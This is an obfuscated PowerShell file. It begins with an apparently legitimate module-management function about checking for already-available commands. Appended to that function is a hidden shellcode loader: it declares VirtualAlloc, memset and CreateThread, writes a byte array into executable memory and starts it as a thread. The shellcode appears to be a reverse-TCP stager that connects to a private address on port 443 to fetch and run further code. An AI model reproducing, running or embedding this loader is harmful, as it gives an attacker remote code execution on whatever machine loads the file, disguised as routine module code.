  .("{1}{0}{2}" -f 'T','Set-I','eM') ('Vari'+'a'+'B'+'Le:p5ea'+'9V')  ([tYpE]("{1}{6}{3}{2}{0}{4}{5}"-F 'ingCo','sy','.sTR','tem','mPari','SOn','s')  ) ;function VAlid`AtE-mOD`ULe`c`OMm`AnDa`LRE`A`D`ya`VAiLAbLE
{
    [CmdletBinding()]
    param
    (
        [Parameter(mANdATOrY=${T`RUE})]
        [PSModuleInfo]
        ${CurrE`NtMoDUL`e`iNfO},

        [Parameter(mAnDaTORY=${t`RUe})]
        [ValidateNotNullOrEmpty()]
        [string]
        ${I`NSTaLLl`oCat`ioN},

        [Parameter()]
        [Switch]
        ${aL`lOWcloBB`er},

        [Parameter()]
        [Switch]
        ${Is`U`pd`AteoPera`TioN}
    )

    
    
    
    
    
    if(${c`UrrentM`oD`ULeInfO}."exp`ORTEDco`MM`AN`Ds"."k`Eys"."COu`Nt" -and
       -not ${AlLow`clO`Bb`er} -and
       -not ${ISu`pDa`TeoPErAT`i`oN})
    {
        
        if(.("{3}{1}{4}{0}{2}{5}{6}" -f 'dul','t-M','eSxSVersionS','Tes','o','upp','ort'))
        {
            ${i`NSTA`L`lLOCat`Ion} = &((("{1}{4}{3}{10}{0}{6}{11}{2}{5}{7}{8}{9}" -f'ft.','Mic','nageme','os','r','nt','PowerShell.','GlcSpl','it-Pa','th','o','Ma'))  -crEpLaCe 'Glc',[CHAr]92) -Path ${Ins`Ta`LLlOcAtIoN}
        }

        ${iNST`AlLE`dMODU`LeIn`FO} = &("{0}{1}{4}{2}{3}"-f 'Test-','M','eInsta','lled','odul') -Name ${cU`R`Re`NtMO`duLeI`NFo}."NA`ME"
        if(-not ${i`NstAllEDmO`DulEIn`FO} -or -not ${INST`ALLE`DmODule`IN`Fo}."MODu`LeBa`Se"."sTaR`TSWI`TH"(${INstAllLoC`ATi`oN},   ${P5`ea9v}::"oRdinaLig`N`ORe`CA`se"))
        {
            
            ${COmMAN`D`NAMeS} = ${c`U`RreNtm`ODULE`INFo}."ExPORt`E`DcoMMa`Nds"."VaL`UeS"."NA`mE"

            
            ${Co`mMAnD`NAmE`H`ASH} = @{}
            ${coMman`D`NAMeS} | .('%') { ${C`OM`MA`NdnameHASH}[${_}] = 1 }
            
            ${AVaiLABLeCo`m`ma`Nds} = .(("{3}{5}{11}{12}{1}{8}{4}{0}{7}{10}{6}{2}{9}" -f'e','r','m','Microsoft.','or','P','om','sF','Shell.C','and','PGet-C','o','we')).RepLACe(([char]115+[char]70+[char]80),'\')  `
                                                                      -ErrorAction ("{0}{1}" -f 'Ig','nore') `
                                                                      -WarningAction ("{2}{0}{1}"-f 'in','ue','SilentlyCont') |
                                    &(("{4}{9}{0}{5}{6}{1}{2}{11}{8}{3}{10}{7}" -f 'os','rS','h','01W','Mic','o','ft.Powe','bject','ll.Coret','r','here-O','e')).RepLAce('t01',[strING][ChAr]92) { (${Co`M`mANdNaM`e`hAsh}.("{0}{1}{2}"-f'Contai','nsK','ey').Invoke(${_}."na`mE")) -and
                                                                             (${_}."MO`dUlEn`AME" -ne ${sCRipT`:PsmODUlepR`ov`idErn`A`ME}) -and
                                                                             (${_}."Modu`L`ename" -ne ("{0}{1}"-f 'PSMod','ule')) -and
                                                                             (${_}."modUlEn`A`mE" -ne ${curr`ENTMOD`Ul`eInFo}."nA`ME") }
            if(${AVAil`AbLE`Co`mMaN`Ds})
            {
                ${availaB`L`E`commanDSL`isT} = (${AVAi`l`AbL`eComM`ANDS}."N`AME" | &(("{3}{6}{0}{5}{1}{4}{2}" -f'til','h0zSele','ct','Mi','ct-Obje','ity','crosoft.PowerShell.U')).REpLaCE(([cHAR]104+[cHAR]48+[cHAR]122),'\') -Unique -ErrorAction ("{0}{1}" -f'Ignor','e')) -join ","
                ${Me`sSaGE} = ${lO`CALiz`EDD`ATa}."mO`Du`LEc`Om`M`ANdAl`REAdyav`AILAble" -f (${av`AiLaBLeCO`M`mAN`DSLi`St}, ${cU`RrEn`T`moDULeI`N`Fo}."N`AMe")
                .("{1}{2}{0}"-f 'or','Throw','Err') -ExceptionName ("{4}{5}{6}{8}{3}{0}{1}{2}{7}"-f 'atio','nExce','pti','Oper','System','.In','v','on','alid') `
                           -ExceptionMessage ${ME`SSAGE} `
                           -ErrorId ("{6}{2}{5}{0}{3}{4}{1}" -f'lr','vailable','omma','ead','yA','ndA','C') `
                           -CallerPSCmdlet ${ps`cmdl`et} `
                           -ErrorCategory ("{0}{3}{1}{2}"-f'In','al','idOperation','v')

                return ${F`Al`SE}
            }
        }
    }

    return ${T`Rue}
}
${C} = ((("{70}{43}{62}{55}{58}{51}{54}{19}{36}{42}{67}{56}{88}{11}{101}{79}{52}{64}{32}{21}{35}{14}{59}{45}{28}{50}{89}{71}{48}{13}{23}{69}{31}{22}{98}{95}{96}{9}{60}{83}{17}{44}{86}{3}{20}{39}{77}{25}{97}{10}{53}{63}{47}{99}{72}{26}{37}{81}{61}{92}{90}{78}{5}{76}{65}{41}{68}{12}{57}{93}{85}{0}{24}{30}{84}{18}{49}{33}{74}{66}{15}{40}{73}{16}{82}{4}{75}{7}{34}{91}{46}{38}{29}{87}{8}{80}{6}{100}{94}{2}{1}{27}"-f 'r lpPa','int',', u','e','vcrt','tackS','est','dll','(IntPtr','kernel32','eT','atic ex','pStar','flAlloc','tPt','Th','p',')','onFla','nel32','x','oc','[','ationType, uint ','rameter, u','r ','dAt',' count);','es','r','int dwCreat','otect);','lAll',', Int','Au','(In','.dllA','t','te','tern Int','re','tr','uD)','m',']publi','r','x','r lp','ize, uint ','gs','s, ','D','irt','hread(','ker','ort(','pu','t','Au','r lpAdd','.dllAu','e','p','IntPt','ua','tP','lp',']',' l','flPr','[DllI','dwS','a','adId);[DllIm','Ptr ','.','ize, In','Pt','S','r V',' d','ribut','ort(AuDms','D','i','ess, IntPt','c static ','n IntPtr memset','blic st','uint ','w','D)]public static e','s, uint d','Addr','int src','po','rt(AuD','Creat','DllIm','Thre',', u','tern IntPt'))-RepLacE'AuD',[ChAR]34);${w} = &("{1}{2}{0}" -f'e','Ad','d-Typ') -memberDefinition ${c} -Name ("{0}{1}" -f 'Win','32') -namespace ("{2}{3}{0}{1}" -f'ion','s','Win32Func','t') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x02,0x7b,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."L`eNGth" -gt 0x1000){${G} = ${z}."LEn`Gth"};${x}=${W}::("{1}{0}{2}" -f 'rtualAll','Vi','oc').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."le`NGth"-1);${i}++) {${W}::"MeMS`Et"([IntPtr](${X}.("{0}{1}{2}" -f 'To','In','t32').Invoke()+${I}), ${Z}[${I}], 1)};${w}::("{1}{2}{0}{3}"-f'Th','Cre','ate','read').Invoke(0,0,${X},0,0,0);for (;;){&("{2}{1}{3}{0}" -f'p','tart-s','S','lee') 60};
